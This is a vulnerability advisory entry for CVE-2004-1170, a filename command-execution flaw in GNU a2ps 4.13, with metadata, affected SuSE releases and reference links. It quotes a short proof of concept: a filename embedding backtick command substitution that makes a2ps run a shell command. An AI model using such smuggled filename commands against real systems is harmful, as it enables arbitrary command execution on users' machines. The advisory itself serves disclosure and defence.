a2ps filename command execution vulnerability

Vulnerability ID: 1108137
Vulnerability type: Input validation
Published: 2004-08-24
Updated: 2006-05-08
CVE ID: CVE-2004-1170
CNNVD-ID: CNNVD-200501-145
Platform: Linux
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/24406
https://www.securityfocus.com/bid/11025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-145
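|Vulnerability details
PostScript is a page description language and programming language used in electronic and desktop publishing. a2ps is a software package developed by the GNU Project that converts files of any type to PostScript. a2ps version 4.13 contains a command execution vulnerability. A remote attacker can execute arbitrary commands via a file name that contains shell metacharacters.
|Vulnerability exploit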
source: http://www.securityfocus.com/bid/11025/info

Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames.

An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application.

Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well. 

$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
42
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'
|Affected products
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SuSE Linux Enterprise Server 9
SuSE Linux 8
|References

Source: BID
Name: 11025
Link: http://www.securityfocus.com/bid/11025
Source: FULLDISC
Name: 20040824a2psexecutingshellcommandsfromfilename
Link: http://archives.neohapsis.com/archives/fulldisclosure/2004-08/1026.html
Source: XF
Name: gnu-a2ps-gain-privileges(17127)
Link: http://xforce.iss.net/xforce/xfdb/17127
Source: MISC
Link: http://www.securiteam.com/unixfocus/5MP0N2KDPA.html
Source: SUSE
Name: SUSE-SA:2004:034
Link: http://www.novell.com/linux/security/advisories/2004_34_xfree86_libs_xshared.html
Source: SECUNIA
Name: 12375
Link: http://secunia.com/advisories/12375
Source: CONFIRM
Name: http://bugs.debian.org/283134
Link: http://bugs.debian.org/283134
Source: FEDORA
Name: FLSA:152870
Link: http://www.securityfocus.com/archive/1/archive/1/419765/100/0/threaded
Source: MANDRAKE
Name: MDKSA-2004:140
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2004:140
Source: SUNALERT
Name: 57649
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57649-1&searchclause=
Source: OPENPKG
Name: OpenPKG-SA-2005.003
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110598355226660&w=2